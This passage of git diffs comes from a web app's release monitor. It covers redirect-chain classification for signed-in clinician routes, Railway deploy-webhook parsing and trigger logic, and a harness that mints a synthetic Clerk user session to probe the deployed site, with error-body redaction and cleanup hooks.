+  | 'sign_in' // bounced to /sign-in (session was not accepted as signed-in)
+  | 'non_200' // terminal status was not 200
+  | 'too_many_hops' // never settled within the hop budget
+  | 'no_hops'; // empty chain (harness error)
+
+export interface NavOutcome {
+  ok: boolean;
+  finalStatus: number | null;
+  finalUrl: string | null;
+  hops: number;
+  reason?: NavFailureReason;
+}
+
+/** Extract just the pathname from a path or absolute URL (query/hash stripped). */
+export function pathOf(pathOrUrl: string): string {
+  try {
+    if (pathOrUrl.startsWith('http')) return new URL(pathOrUrl).pathname;
+  } catch {
+    /* fall through to manual strip */
+  }
+  return pathOrUrl.split('?')[0].split('#')[0];
+}
+
+export function isAuthErrorPath(pathOrUrl: string): boolean {
+  return pathOf(pathOrUrl).startsWith('/auth/error');
+}
+
+export function isSignInPath(pathOrUrl: string): boolean {
+  return pathOf(pathOrUrl).startsWith('/sign-in');
+}
+
+export function isResolvingPath(pathOrUrl: string): boolean {
+  return pathOf(pathOrUrl).startsWith('/auth/resolving');
+}
+
+/**
+ * Classify a manually-followed redirect chain for one target route.
+ *
+ * PASS = the chain settled on a 200 whose path is not /auth/error or /sign-in,
+ * with no repeated path. A hop through /auth/error fails as `auth_error` even
+ * if a later hop 200s, because /auth/error is the circuit-breaker the P0
+ * tripped. Used for the steady-state per-route checks, where the role is
+ * already resolved so a healthy chain is a single 200 with no redirects.
+ */
+export function analyzeNavigation(hops: NavHop[]): NavOutcome {
+  if (hops.length === 0) {
+    return { ok: false, finalStatus: null, finalUrl: null, hops: 0, reason: 'no_hops' };
+  }
+
+  const seen = new Set<string>();
+  for (const hop of hops) {
+    if (isAuthErrorPath(hop.url) || (hop.location && isAuthErrorPath(hop.location))) {
+      return { ok: false, finalStatus: hop.status, finalUrl: hop.url, hops: hops.length, reason: 'auth_error' };
+    }
+    if (isSignInPath(hop.url) || (hop.location && isSignInPath(hop.location))) {
+      return { ok: false, finalStatus: hop.status, finalUrl: hop.url, hops: hops.length, reason: 'sign_in' };
+    }
+    const key = pathOf(hop.url);
+    if (seen.has(key)) {
+      return { ok: false, finalStatus: hop.status, finalUrl: hop.url, hops: hops.length, reason: 'redirect_loop' };
+    }
+    seen.add(key);
+  }
+
+  const last = hops[hops.length - 1];
+  if (last.status !== 200) {
+    const reason: NavFailureReason = last.status >= 300 && last.status < 400 ? 'too_many_hops' : 'non_200';
+    return { ok: false, finalStatus: last.status, finalUrl: last.url, hops: hops.length, reason };
+  }
+
+  return { ok: true, finalStatus: 200, finalUrl: last.url, hops: hops.length };
+}

--- a/apps/web/lib/release-monitor/holderRoutes.ts
+++ b/apps/web/lib/release-monitor/holderRoutes.ts
@@ -39,6 +39,7 @@ export type NavFailureReason =
   | 'auth_error' // passed through /auth/error — the P0 signature
   | 'redirect_loop' // a URL repeated in the chain
   | 'sign_in' // bounced to /sign-in (session was not accepted as signed-in)
+  | 'wrong_destination' // settled 200, but NOT on the requested surface (e.g. a role-mismatch redirect)
   | 'non_200' // terminal status was not 200
   | 'too_many_hops' // never settled within the hop budget
   | 'no_hops'; // empty chain (harness error)
@@ -77,12 +78,18 @@ export function isResolvingPath(pathOrUrl: string): boolean {
  * Classify a manually-followed redirect chain for one target route.
  *
  * PASS = the chain settled on a 200 whose path is not /auth/error or /sign-in,
- * with no repeated path. A hop through /auth/error fails as `auth_error` even
- * if a later hop 200s, because /auth/error is the circuit-breaker the P0
- * tripped. Used for the steady-state per-route checks, where the role is
- * already resolved so a healthy chain is a single 200 with no redirects.
+ * with no repeated path — and, when `expectedPath` is given, ON the requested
+ * surface (the terminal path must equal it or live under it). Without that
+ * last constraint a role-mismatch redirect would fool the monitor: middleware
+ * bounces a wrong-role user to their ROLE_LANDING (e.g. /holder → /verifier),
+ * which 200s — a clean-looking chain that never reached the clinician surface.
+ *
+ * A hop through /auth/error fails as `auth_error` even if a later hop 200s,
+ * because /auth/error is the circuit-breaker the P0 tripped. Used for the
+ * steady-state per-route checks, where the role is already resolved so a
+ * healthy chain is a single 200 with no redirects.
  */
-export function analyzeNavigation(hops: NavHop[]): NavOutcome {
+export function analyzeNavigation(hops: NavHop[], expectedPath?: string): NavOutcome {
   if (hops.length === 0) {
     return { ok: false, finalStatus: null, finalUrl: null, hops: 0, reason: 'no_hops' };
   }
@@ -106,6 +113,13 @@ export function analyzeNavigation(hops: NavHop[]): NavOutcome {
   if (last.status !== 200) {
     const reason: NavFailureReason = last.status >= 300 && last.status < 400 ? 'too_many_hops' : 'non_200';
     return { ok: false, finalStatus: last.status, finalUrl: last.url, hops: hops.length, reason };
+  }
+
+  if (expectedPath) {
+    const finalPath = pathOf(last.url);
+    if (finalPath !== expectedPath && !finalPath.startsWith(`${expectedPath}/`)) {
+      return { ok: false, finalStatus: 200, finalUrl: last.url, hops: hops.length, reason: 'wrong_destination' };
+    }
   }
 
   return { ok: true, finalStatus: 200, finalUrl: last.url, hops: hops.length };

--- a/apps/web/lib/release-monitor/railwayWebhook.ts
+++ b/apps/web/lib/release-monitor/railwayWebhook.ts
@@ -1,0 +1,108 @@
+/**
+ * Pure parsing + trigger-decision for the Railway deploy webhook.
+ *
+ * Railway (Project → Webhooks) POSTs a deployment-status payload on each deploy.
+ * The payload shape has drifted across Railway versions (status/service can sit
+ * at the top level or nested under `deployment`), so the parser is deliberately
+ * tolerant and normalizes to one shape. No I/O — the receiver route does the
+ * auth + the GitHub dispatch; this module only decides *whether* to dispatch.
+ */
+
+export interface RailwayDeployEvent {
+  /** e.g. 'DEPLOY' — may be absent in some payloads. */
+  type: string | null;
+  /** e.g. 'SUCCESS' | 'FAILED' | 'CRASHED' | 'BUILDING' | 'DEPLOYING'. */
+  status: string | null;
+  serviceName: string | null;
+  environmentName: string | null;
+  deploymentId: string | null;
+  /** Deployed commit hash, when the payload carries deploy meta. */
+  commit: string | null;
+  projectId: string | null;
+}
+
+function str(v: unknown): string | null {
+  return typeof v === 'string' && v.trim() ? v.trim() : null;
+}
+
+function obj(v: unknown): Record<string, unknown> {
+  return v && typeof v === 'object' ? (v as Record<string, unknown>) : {};
+}
+
+/**
+ * Normalize a raw Railway webhook body into a RailwayDeployEvent, or null when
+ * the body is not a recognizable deploy notification (neither a type nor a
+ * status is present).
+ */
+export function parseRailwayDeployEvent(payload: unknown): RailwayDeployEvent | null {
+  if (!payload || typeof payload !== 'object') return null;
+  const p = obj(payload);
+  const deployment = obj(p.deployment);
+  const meta = obj(deployment.meta);
+  const service = Object.keys(obj(p.service)).length ? obj(p.service) : obj(deployment.service);
+  const environment = obj(p.environment);
+  const project = obj(p.project);
+
+  const type = str(p.type) ?? str(deployment.type);
+  const status = str(p.status) ?? str(deployment.status);
+  if (!type && !status) return null;
+
+  return {
+    type,
+    status,
+    serviceName: str(service.name) ?? str(p.serviceName),
+    environmentName: str(environment.name) ?? str(p.environmentName),
+    deploymentId: str(deployment.id) ?? str(p.deploymentId),
+    commit: str(meta.commitHash) ?? str(meta.commit) ?? str(deployment.commitHash),
+    projectId: str(project.id) ?? str(p.projectId),
+  };
+}
+
+export interface TriggerOptions {
+  /** Railway service name of the web app. Default 'vitalcv-web'. */
+  webServiceName?: string;
+  /** Railway environment to gate on. Default 'production'. */
+  environmentName?: string;
+}
+
+export interface TriggerDecision {
+  trigger: boolean;
+  reason: string;
+}
+
+/**
+ * Decide whether a parsed event should kick a release verification.
+ *
+ * Fires only on a **web-service SUCCESS deploy** in the target environment.
+ * Bias-to-run on ambiguity: a missing service name (payload drift) still
+ * triggers — over-running is safe (the verify run just re-confirms web and the
+ * scheduled net runs anyway), whereas missing a real web deploy is the failure
+ * we're guarding against. A present-but-mismatched service/env always skips.
+ */
+export function shouldTriggerVerification(
+  event: RailwayDeployEvent | null,
+  opts: TriggerOptions = {},
+): TriggerDecision {
+  if (!event) return { trigger: false, reason: 'unparseable payload' };
+
+  const status = (event.status ?? '').toUpperCase();
+  if (status !== 'SUCCESS') return { trigger: false, reason: `status ${status || '∅'} is not SUCCESS` };
+
+  if (event.type && !/DEPLOY/i.test(event.type)) {
+    return { trigger: false, reason: `type ${event.type} is not a deploy` };
+  }
+
+  const wantService = (opts.webServiceName ?? 'vitalcv-web').toLowerCase();
+  const svc = (event.serviceName ?? '').toLowerCase();
+  if (svc && svc !== wantService) {
+    return { trigger: false, reason: `service ${event.serviceName} is not ${opts.webServiceName ?? 'vitalcv-web'}` };
+  }
+
+  const wantEnv = (opts.environmentName ?? 'production').toLowerCase();
+  const env = (event.environmentName ?? '').toLowerCase();
+  if (env && env !== wantEnv) {
+    return { trigger: false, reason: `environment ${event.environmentName} is not ${opts.environmentName ?? 'production'}` };
+  }
+
+  return { trigger: true, reason: 'web SUCCESS deploy' };
+}

--- a/apps/web/lib/release-monitor/railwayWebhook.ts
+++ b/apps/web/lib/release-monitor/railwayWebhook.ts
@@ -43,6 +43,8 @@ export function parseRailwayDeployEvent(payload: unknown): RailwayDeployEvent | 
   const environment = obj(p.environment);
   const project = obj(p.project);
 
+  const deploymentEnv = obj(deployment.environment);
+
   const type = str(p.type) ?? str(deployment.type);
   const status = str(p.status) ?? str(deployment.status);
   if (!type && !status) return null;
@@ -51,7 +53,7 @@ export function parseRailwayDeployEvent(payload: unknown): RailwayDeployEvent | 
     type,
     status,
     serviceName: str(service.name) ?? str(p.serviceName),
-    environmentName: str(environment.name) ?? str(p.environmentName),
+    environmentName: str(environment.name) ?? str(deploymentEnv.name) ?? str(p.environmentName),
     deploymentId: str(deployment.id) ?? str(p.deploymentId),
     commit: str(meta.commitHash) ?? str(meta.commit) ?? str(deployment.commitHash),
     projectId: str(project.id) ?? str(p.projectId),
@@ -73,11 +75,16 @@ export interface TriggerDecision {
 /**
  * Decide whether a parsed event should kick a release verification.
  *
- * Fires only on a **web-service SUCCESS deploy** in the target environment.
- * Bias-to-run on ambiguity: a missing service name (payload drift) still
- * triggers — over-running is safe (the verify run just re-confirms web and the
- * scheduled net runs anyway), whereas missing a real web deploy is the failure
- * we're guarding against. A present-but-mismatched service/env always skips.
+ * Fails CLOSED: fires only when the payload POSITIVELY proves a web-service
+ * SUCCESS deploy in the target environment — service name AND environment name
+ * must be present and match. An absent/ambiguous service or env skips.
+ *
+ * Rationale (was previously bias-to-run on absent service): a non-web deploy
+ * (e.g. the API service) arriving in a drifted payload with an absent service
+ * name would otherwise trigger a web verification, whose SHA check fails against
+ * the non-web deploy commit, posting a FALSE-RED `vitalcv/release-verified`
+ * status on an unrelated commit. Missing a real web webhook is cheap — the
+ * scheduled run backstops it; painting the wrong commit red is not.
  */
 export function shouldTriggerVerification(
   event: RailwayDeployEvent | null,
@@ -94,14 +101,14 @@ export function shouldTriggerVerification(
 
   const wantService = (opts.webServiceName ?? 'vitalcv-web').toLowerCase();
   const svc = (event.serviceName ?? '').toLowerCase();
-  if (svc && svc !== wantService) {
-    return { trigger: false, reason: `service ${event.serviceName} is not ${opts.webServiceName ?? 'vitalcv-web'}` };
+  if (svc !== wantService) {
+    return { trigger: false, reason: `service ${event.serviceName ?? '∅'} is not ${opts.webServiceName ?? 'vitalcv-web'}` };
   }
 
   const wantEnv = (opts.environmentName ?? 'production').toLowerCase();
   const env = (event.environmentName ?? '').toLowerCase();
-  if (env && env !== wantEnv) {
-    return { trigger: false, reason: `environment ${event.environmentName} is not ${opts.environmentName ?? 'production'}` };
+  if (env !== wantEnv) {
+    return { trigger: false, reason: `environment ${event.environmentName ?? '∅'} is not ${opts.environmentName ?? 'production'}` };
   }
 
   return { trigger: true, reason: 'web SUCCESS deploy' };

--- a/apps/web/lib/release-monitor/syntheticClinician.ts
+++ b/apps/web/lib/release-monitor/syntheticClinician.ts
@@ -75,6 +75,32 @@ export interface MintResult {
   error?: string;
 }
 
+/**
+ * Reduce a Clerk / FAPI error body to safe, structured fields before it can
+ * reach logs, the Actions job summary, or report.json. Clerk error responses
+ * are `{ errors: [{ code, message, long_message }] }`; a raw-body dump risked
+ * echoing credential-adjacent material (the sign-in ticket, request echoes).
+ * We keep only code + message, and defensively redact any long token-like
+ * fragment that slips through.
+ */
+export function safeErrorBody(text: string): string {
+  try {
+    const parsed = JSON.parse(text) as { errors?: Array<{ code?: unknown; message?: unknown }> };
+    const errs = Array.isArray(parsed?.errors) ? parsed.errors : [];
+    const fields = errs
+      .flatMap((e) => [typeof e?.code === 'string' ? e.code : '', typeof e?.message === 'string' ? e.message : ''])
+      .filter(Boolean)
+      .slice(0, 4);
+    const joined = fields.join('; ').slice(0, 160);
+    // Redact token-like runs (≥16 chars containing a digit — tickets/JWTs/keys)
+    // while leaving readable word-codes like `form_identifier_exists` intact.
+    const redacted = joined.replace(/[A-Za-z0-9_-]{16,}/g, (m) => (/\d/.test(m) ? '[redacted]' : m));
+    return redacted || 'clerk error (no safe fields)';
+  } catch {
+    return 'clerk error (unparseable body)';
+  }
+}
+
 // ── cookie-jar helpers ──────────────────────────────────────────────────────
 
 function getSetCookies(res: Response): string[] {
@@ -176,7 +202,7 @@ export async function mintClinicianSession(deps: SyntheticClinicianDeps): Promis
       signal: AbortSignal.timeout(15000),
     });
     if (!userRes.ok) {
-      return { ok: false, created, error: `create user ${userRes.status}: ${(await userRes.text()).slice(0, 200)}` };
+      return { ok: false, created, error: `create user ${userRes.status}: ${safeErrorBody(await userRes.text())}` };
     }
     const user = (await userRes.json()) as { id: string };
     created.userId = user.id;
@@ -205,7 +231,7 @@ export async function mintClinicianSession(deps: SyntheticClinicianDeps): Promis
       signal: AbortSignal.timeout(15000),
     });
     if (!tokenRes.ok) {
-      return { ok: false, created, error: `sign_in_tokens ${tokenRes.status}: ${(await tokenRes.text()).slice(0, 200)}` };
+      return { ok: false, created, error: `sign_in_tokens ${tokenRes.status}: ${safeErrorBody(await tokenRes.text())}` };
     }
     const ticket = ((await tokenRes.json()) as { token: string }).token;
 
@@ -218,7 +244,7 @@ export async function mintClinicianSession(deps: SyntheticClinicianDeps): Promis
     });
     mergeSetCookie(jar, signInRes);
     if (!signInRes.ok) {
-      return { ok: false, created, error: `FAPI sign_ins ${signInRes.status}: ${(await signInRes.text()).slice(0, 200)}` };
+      return { ok: false, created, error: `FAPI sign_ins ${signInRes.status}: ${safeErrorBody(await signInRes.text())}` };
     }
     const signIn = (await signInRes.json()) as {
       response?: { created_session_id?: string; status?: string };
@@ -257,7 +283,7 @@ export async function mintClinicianSession(deps: SyntheticClinicianDeps): Promis
     });
     mergeSetCookie(jar, jwtRes);
     if (!jwtRes.ok) {
-      return { ok: false, created, error: `FAPI session tokens ${jwtRes.status}: ${(await jwtRes.text()).slice(0, 200)}` };
+      return { ok: false, created, error: `FAPI session tokens ${jwtRes.status}: ${safeErrorBody(await jwtRes.text())}` };
     }
     const jwt = ((await jwtRes.json()) as { jwt: string }).jwt;
     if (!jwt) return { ok: false, created, error: 'no jwt returned from session tokens' };

--- a/apps/web/lib/release-monitor/syntheticClinician.ts
+++ b/apps/web/lib/release-monitor/syntheticClinician.ts
@@ -54,6 +54,10 @@ export interface SyntheticClinicianDeps {
   /** Deterministic run id — seeds the synthetic email/org name (no Math.random). */
   runId: string;
   now?: () => number;
+  /** Invoked with a snapshot of created ids the instant each Clerk resource
+   *  exists (user, then org), so a hard-kill handler can clean up resources
+   *  created mid-mint — before mintClinicianSession() returns. */
+  onResourceCreated?: (created: { userId: string | null; orgId: string | null }) => void;
 }
 
 export interface ClinicianSession {
@@ -206,6 +210,10 @@ export async function mintClinicianSession(deps: SyntheticClinicianDeps): Promis
     }
     const user = (await userRes.json()) as { id: string };
     created.userId = user.id;
+    // Report the id THE INSTANT it exists — a hard kill (step timeout) during the
+    // subsequent FAPI work must still be able to clean this user up. Reporting
+    // only after mint() returns would leak a user created mid-mint.
+    deps.onResourceCreated?.({ ...created });
 
     // 2. Create an org owned by the user (satisfies instances that require an active org).
     try {
@@ -218,6 +226,7 @@ export async function mintClinicianSession(deps: SyntheticClinicianDeps): Promis
       if (orgRes.ok) {
         const org = (await orgRes.json()) as { id: string };
         created.orgId = org.id;
+        deps.onResourceCreated?.({ ...created });
       }
     } catch {
       /* org is best-effort — instances without orgs still yield a usable session */

--- a/apps/web/lib/release-monitor/syntheticClinician.ts
+++ b/apps/web/lib/release-monitor/syntheticClinician.ts
@@ -1,0 +1,454 @@
+/**
+ * Synthetic signed-in-clinician harness (Clerk Backend API + FAPI).
+ *
+ * Reproduces a real active Clerk clinician session end-to-end so the release
+ * monitor can black-box the signed-in `/holder/*` flow the way a real user
+ * experiences it — the same technique used to diagnose the signed-in-clinician
+ * P0 (memory `signed_in_clinician_auth_p0.md`), promoted here from a throwaway
+ * session script into tested, reusable code.
+ *
+ * Sequence:
+ *   1. Clerk Backend API  POST /v1/users                 → synthetic user
+ *   2. Clerk Backend API  POST /v1/organizations         → org (created_by user)
+ *   3. Clerk Backend API  POST /v1/sign_in_tokens        → one-time ticket
+ *   4. FAPI               POST /v1/client/sign_ins        → redeem ticket (strategy=ticket)
+ *   5. FAPI               POST /v1/client/sessions/{sid}/touch  → set active org
+ *   6. FAPI               POST /v1/client/sessions/{sid}/tokens → __session JWT
+ *   → cleanup deletes the org + user (best-effort, always runs)
+ *
+ * `fetch` is injected so the step sequence / cookie propagation / cleanup calls
+ * are unit-testable; the live redemption is validated by the owner running the
+ * workflow with real secrets. Every synthetic identity uses an `@*.local` email
+ * so it can never collide with (or rebind, per #504) a real user row.
+ */
+
+import {
+  analyzeNavigation,
+  isAuthErrorPath,
+  isResolvingPath,
+  isSignInPath,
+  type NavHop,
+  type NavOutcome,
+} from './holderRoutes';
+
+export type FetchLike = typeof fetch;
+
+const BROWSER_UA =
+  'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 ' +
+  '(KHTML, like Gecko) Chrome/124.0 Safari/537.36 vitalcv-release-monitor';
+
+const CLERK_JS_VERSION = '5';
+const DEFAULT_CLERK_API = 'https://api.clerk.com';
+const DEFAULT_FAPI = 'https://clerk.vitalcv.com';
+
+export interface SyntheticClinicianDeps {
+  fetchImpl?: FetchLike;
+  clerkSecretKey: string;
+  /** Clerk Backend API base. Default https://api.clerk.com. */
+  clerkApiBase?: string;
+  /** Clerk Frontend API (FAPI) base. Default https://clerk.vitalcv.com. */
+  fapiBase?: string;
+  /** Deployed web origin, e.g. https://vitalcv.com — the FAPI Origin + the app under test. */
+  appBase: string;
+  /** Deterministic run id — seeds the synthetic email/org name (no Math.random). */
+  runId: string;
+  now?: () => number;
+}
+
+export interface ClinicianSession {
+  userId: string;
+  orgId: string | null;
+  sessionId: string | null;
+  jwt: string;
+  clientUat: string;
+  /** Cookie jar (name → value); seeded with __session/__client_uat, gains vitalcv_role. */
+  cookies: Record<string, string>;
+  email: string;
+}
+
+export interface MintResult {
+  ok: boolean;
+  session?: ClinicianSession;
+  /** Always populated with whatever was created, so cleanup can run on partial failure. */
+  created: { userId: string | null; orgId: string | null };
+  error?: string;
+}
+
+// ── cookie-jar helpers ──────────────────────────────────────────────────────
+
+function getSetCookies(res: Response): string[] {
+  const anyHeaders = res.headers as unknown as { getSetCookie?: () => string[] };
+  if (typeof anyHeaders.getSetCookie === 'function') return anyHeaders.getSetCookie();
+  const single = res.headers.get('set-cookie');
+  return single ? [single] : [];
+}
+
+export function mergeSetCookie(jar: Record<string, string>, res: Response): void {
+  for (const c of getSetCookies(res)) {
+    const pair = c.split(';', 1)[0];
+    const idx = pair.indexOf('=');
+    if (idx < 0) continue;
+    const name = pair.slice(0, idx).trim();
+    const value = pair.slice(idx + 1).trim();
+    if (name) jar[name] = value;
+  }
+}
+
+export function cookieHeader(jar: Record<string, string>): string {
+  return Object.entries(jar)
+    .map(([k, v]) => `${k}=${v}`)
+    .join('; ');
+}
+
+function absolutize(location: string, currentUrl: string): string {
+  try {
+    return new URL(location, currentUrl).toString();
+  } catch {
+    return location;
+  }
+}
+
+function relPath(url: string): string {
+  try {
+    const u = new URL(url);
+    return u.pathname + u.search;
+  } catch {
+    return url;
+  }
+}
+
+// ── Clerk Backend API + FAPI primitives ─────────────────────────────────────
+
+function backendHeaders(secret: string): Record<string, string> {
+  return {
+    Authorization: `Bearer ${secret}`,
+    'Content-Type': 'application/json',
+    'User-Agent': BROWSER_UA,
+  };
+}
+
+function fapiUrl(base: string, path: string): string {
+  const sep = path.includes('?') ? '&' : '?';
+  return `${base}${path}${sep}_clerk_js_version=${CLERK_JS_VERSION}`;
+}
+
+function fapiHeaders(origin: string, jar: Record<string, string>): Record<string, string> {
+  const h: Record<string, string> = {
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'User-Agent': BROWSER_UA,
+    Origin: origin,
+    Referer: origin + '/',
+  };
+  const cookie = cookieHeader(jar);
+  if (cookie) h.Cookie = cookie;
+  return h;
+}
+
+/** Mint a fresh synthetic clinician session. Never throws — returns MintResult. */
+export async function mintClinicianSession(deps: SyntheticClinicianDeps): Promise<MintResult> {
+  const fetchImpl = deps.fetchImpl ?? fetch;
+  const clerkApi = deps.clerkApiBase ?? DEFAULT_CLERK_API;
+  const fapi = deps.fapiBase ?? DEFAULT_FAPI;
+  const origin = new URL(deps.appBase).origin;
+  const nowMs = (deps.now ?? Date.now)();
+  const email = `svc-monitor+${deps.runId}@vitalcv-monitor.local`;
+  const created: { userId: string | null; orgId: string | null } = { userId: null, orgId: null };
+  const jar: Record<string, string> = {};
+
+  try {
+    // 1. Create the synthetic user (role hint in metadata; the backend upsert is authoritative).
+    const userRes = await fetchImpl(`${clerkApi}/v1/users`, {
+      method: 'POST',
+      headers: backendHeaders(deps.clerkSecretKey),
+      body: JSON.stringify({
+        email_address: [email],
+        skip_password_checks: true,
+        skip_password_requirement: true,
+        public_metadata: { vitalcv: { role: 'CLINICIAN' }, synthetic: true, purpose: 'release-monitor' },
+      }),
+      signal: AbortSignal.timeout(15000),
+    });
+    if (!userRes.ok) {
+      return { ok: false, created, error: `create user ${userRes.status}: ${(await userRes.text()).slice(0, 200)}` };
+    }
+    const user = (await userRes.json()) as { id: string };
+    created.userId = user.id;
+
+    // 2. Create an org owned by the user (satisfies instances that require an active org).
+    try {
+      const orgRes = await fetchImpl(`${clerkApi}/v1/organizations`, {
+        method: 'POST',
+        headers: backendHeaders(deps.clerkSecretKey),
+        body: JSON.stringify({ name: `vcv-monitor-${deps.runId}`, created_by: user.id }),
+        signal: AbortSignal.timeout(15000),
+      });
+      if (orgRes.ok) {
+        const org = (await orgRes.json()) as { id: string };
+        created.orgId = org.id;
+      }
+    } catch {
+      /* org is best-effort — instances without orgs still yield a usable session */
+    }
+
+    // 3. One-time sign-in ticket.
+    const tokenRes = await fetchImpl(`${clerkApi}/v1/sign_in_tokens`, {
+      method: 'POST',
+      headers: backendHeaders(deps.clerkSecretKey),
+      body: JSON.stringify({ user_id: user.id }),
+      signal: AbortSignal.timeout(15000),
+    });
+    if (!tokenRes.ok) {
+      return { ok: false, created, error: `sign_in_tokens ${tokenRes.status}: ${(await tokenRes.text()).slice(0, 200)}` };
+    }
+    const ticket = ((await tokenRes.json()) as { token: string }).token;
+
+    // 4. Redeem the ticket at the FAPI to create the client session.
+    const signInRes = await fetchImpl(fapiUrl(fapi, '/v1/client/sign_ins'), {
+      method: 'POST',
+      headers: fapiHeaders(origin, jar),
+      body: new URLSearchParams({ strategy: 'ticket', ticket }).toString(),
+      signal: AbortSignal.timeout(15000),
+    });
+    mergeSetCookie(jar, signInRes);
+    if (!signInRes.ok) {
+      return { ok: false, created, error: `FAPI sign_ins ${signInRes.status}: ${(await signInRes.text()).slice(0, 200)}` };
+    }
+    const signIn = (await signInRes.json()) as {
+      response?: { created_session_id?: string; status?: string };
+      client?: { sessions?: Array<{ id: string }>; last_active_session_id?: string };
+    };
+    const sessionId =
+      signIn.response?.created_session_id ??
+      signIn.client?.last_active_session_id ??
+      signIn.client?.sessions?.[0]?.id ??
+      null;
+    if (!sessionId) {
+      return { ok: false, created, error: `no session id after ticket redemption (status=${signIn.response?.status ?? '∅'})` };
+    }
+
+    // 5. Set the active organization on the session (best-effort).
+    if (created.orgId) {
+      try {
+        const touchRes = await fetchImpl(fapiUrl(fapi, `/v1/client/sessions/${sessionId}/touch`), {
+          method: 'POST',
+          headers: fapiHeaders(origin, jar),
+          body: new URLSearchParams({ active_organization_id: created.orgId }).toString(),
+          signal: AbortSignal.timeout(15000),
+        });
+        mergeSetCookie(jar, touchRes);
+      } catch {
+        /* touch is best-effort */
+      }
+    }
+
+    // 6. Mint the __session JWT.
+    const jwtRes = await fetchImpl(fapiUrl(fapi, `/v1/client/sessions/${sessionId}/tokens`), {
+      method: 'POST',
+      headers: fapiHeaders(origin, jar),
+      body: '',
+      signal: AbortSignal.timeout(15000),
+    });
+    mergeSetCookie(jar, jwtRes);
+    if (!jwtRes.ok) {
+      return { ok: false, created, error: `FAPI session tokens ${jwtRes.status}: ${(await jwtRes.text()).slice(0, 200)}` };
+    }
+    const jwt = ((await jwtRes.json()) as { jwt: string }).jwt;
+    if (!jwt) return { ok: false, created, error: 'no jwt returned from session tokens' };
+
+    // Middleware treats a cookie session as signed-out unless __client_uat is
+    // present and non-zero (P0 harness note). Seed both cookies + send the
+    // bearer, so auth never reads as signed-out for a transport reason.
+    const clientUat = jar.__client_uat ?? String(Math.floor(nowMs / 1000));
+    jar.__session = jwt;
+    jar.__client_uat = clientUat;
+
+    return {
+      ok: true,
+      created,
+      session: { userId: user.id, orgId: created.orgId, sessionId, jwt, clientUat, cookies: jar, email },
+    };
+  } catch (err) {
+    return { ok: false, created, error: `mint error: ${(err as Error).message}` };
+  }
+}
+
+/** Re-mint the short-lived __session JWT (60s TTL) to widen the verification window. */
+export async function refreshSessionToken(deps: SyntheticClinicianDeps, session: ClinicianSession): Promise<boolean> {
+  if (!session.sessionId) return false;
+  const fetchImpl = deps.fetchImpl ?? fetch;
+  const fapi = deps.fapiBase ?? DEFAULT_FAPI;
+  const origin = new URL(deps.appBase).origin;
+  try {
+    const res = await fetchImpl(fapiUrl(fapi, `/v1/client/sessions/${session.sessionId}/tokens`), {
+      method: 'POST',
+      headers: fapiHeaders(origin, session.cookies),
+      body: '',
+      signal: AbortSignal.timeout(15000),
+    });
+    mergeSetCookie(session.cookies, res);
+    if (!res.ok) return false;
+    const jwt = ((await res.json()) as { jwt: string }).jwt;
+    if (!jwt) return false;
+    session.jwt = jwt;
+    session.cookies.__session = jwt;
+    return true;
+  } catch {
+    return false;
+  }
+}
+
+function authHeaders(session: ClinicianSession): Record<string, string> {
+  return {
+    Authorization: `Bearer ${session.jwt}`,
+    Cookie: cookieHeader(session.cookies),
+    'User-Agent': BROWSER_UA,
+    Accept: 'text/html,application/xhtml+xml',
+  };
+}
+
+export interface WarmUpResult {
+  ok: boolean;
+  hops: NavHop[];
+  reason?: string;
+}
+
+/**
+ * Drive the cold-start signed-in navigation the way a browser would, capturing
+ * the `vitalcv_role` cookie the flow mints. This IS the P0 detector: a fresh
+ * session hitting `/holder` either resolves (200, cookie set — the #503 shape),
+ * bounces to `/auth/error` (P0 live), or is handed the `/auth/resolving`
+ * interstitial (#507), which we emulate by calling `/api/auth/resolve-role`.
+ */
+export async function warmUpClinicianSession(
+  deps: SyntheticClinicianDeps,
+  session: ClinicianSession,
+  maxHops = 8,
+): Promise<WarmUpResult> {
+  const fetchImpl = deps.fetchImpl ?? fetch;
+  const origin = new URL(deps.appBase).origin;
+  const hops: NavHop[] = [];
+  let url = `${deps.appBase}/holder`;
+
+  for (let i = 0; i < maxHops; i += 1) {
+    let res: Response;
+    try {
+      res = await fetchImpl(url, { headers: authHeaders(session), redirect: 'manual', signal: AbortSignal.timeout(15000) });
+    } catch (err) {
+      return { ok: false, hops, reason: `request error: ${(err as Error).message}` };
+    }
+    mergeSetCookie(session.cookies, res);
+    const location = res.headers.get('location');
+    hops.push({ url: relPath(url), status: res.status, location });
+
+    if (res.status === 200) return { ok: true, hops };
+
+    if (res.status >= 300 && res.status < 400 && location) {
+      if (isAuthErrorPath(location)) return { ok: false, hops, reason: 'auth_error' };
+      if (isSignInPath(location)) return { ok: false, hops, reason: 'sign_in' };
+      if (isResolvingPath(location)) {
+        // Emulate the interstitial's browser fetch to mint the role cookie.
+        try {
+          const rr = await fetchImpl(`${deps.appBase}/api/auth/resolve-role`, {
+            headers: { ...authHeaders(session), 'x-clerk-user-id': session.userId, Origin: origin },
+            redirect: 'manual',
+            signal: AbortSignal.timeout(15000),
+          });
+          mergeSetCookie(session.cookies, rr);
+          if (!rr.ok) return { ok: false, hops, reason: `resolve-role ${rr.status}` };
+        } catch (err) {
+          return { ok: false, hops, reason: `resolve-role error: ${(err as Error).message}` };
+        }
+        url = `${deps.appBase}/holder`;
+        continue;
+      }
+      url = absolutize(location, url);
+      continue;
+    }
+
+    return { ok: false, hops, reason: `non_200 status ${res.status}` };
+  }
+  return { ok: false, hops, reason: 'too_many_hops' };
+}
+
+/** Steady-state reachability of one route with the (now resolved) session. */
+export async function reachRoute(
+  deps: SyntheticClinicianDeps,
+  session: ClinicianSession,
+  path: string,
+  maxHops = 5,
+): Promise<NavOutcome> {
+  const fetchImpl = deps.fetchImpl ?? fetch;
+  const hops: NavHop[] = [];
+  let url = `${deps.appBase}${path}`;
+
+  for (let i = 0; i < maxHops; i += 1) {
+    let res: Response;
+    try {
+      res = await fetchImpl(url, { headers: authHeaders(session), redirect: 'manual', signal: AbortSignal.timeout(15000) });
+    } catch (err) {
+      return { ok: false, finalStatus: 0, finalUrl: `${path} (${(err as Error).message})`, hops: hops.length + 1, reason: 'non_200' };
+    }
+    mergeSetCookie(session.cookies, res);
+    const location = res.headers.get('location');
+    hops.push({ url: relPath(url), status: res.status, location });
+    if (res.status >= 300 && res.status < 400 && location) {
+      url = absolutize(location, url);
+      continue;
+    }
+    break;
+  }
+  return analyzeNavigation(hops);
+}
+
+export interface CleanupResult {
